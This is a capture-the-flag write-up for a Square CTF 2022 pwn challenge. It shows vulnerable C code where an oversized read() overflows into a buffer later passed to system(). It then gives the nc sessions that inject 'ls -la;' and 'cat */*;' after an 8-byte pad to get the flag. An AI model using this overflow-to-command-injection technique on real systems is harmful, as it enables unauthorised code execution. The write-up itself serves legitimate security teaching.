Rating:
Code vulnerable to buffer overflow:
```c
char command[16];
char way_too_small_input_buf[8];
//...
read(0, way_too_small_input_buf, 24);
//...
system(command);
```
You have 15 chars avaliable to do a RCE. By writing a string longer than 8 chars, you will overwrite `command` content, so you can run any arbitrary code.
By running the code without anything, it will just print the folder content:
```
$ nc chals.2022.squarectf.com 4100
Hi! would you like me to ls the current directory?
Ok, here ya go!
ez-pwn-1 the_flag_is_in_here
```
So, we can see that the flag is indeed in this directory. Now let's see which kind of file is "the_flag_is_in_here"
```
$ nc chals.2022.squarectf.com 4100
Hi! would you like me to ls the current directory?
AAAAAAAAls -la;
Ok, here ya go!
total 36
drwxr-x--- 1 root pwnable_user 4096 Nov 9 04:49 .
drwxr-xr-x 1 root root 4096 Nov 6 21:45 ..
-rw-r--r-- 1 root pwnable_user 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root pwnable_user 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root pwnable_user 807 Jan 6 2022 .profile
-r-xr-x--- 1 root pwnable_user 8528 Nov 6 21:09 ez-pwn-1
drwxr-xr-x 1 root pwnable_user 4096 Nov 9 04:49 the_flag_is_in_here
```
It's a directory, by using cat */* we can print the content of every file in every folder (by one level)
```
$ nc chals.2022.squarectf.com 4100
Hi! would you like me to ls the current directory?
AAAAAAAAcat */*;
Ok, here ya go!
flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
```
Got the flag!
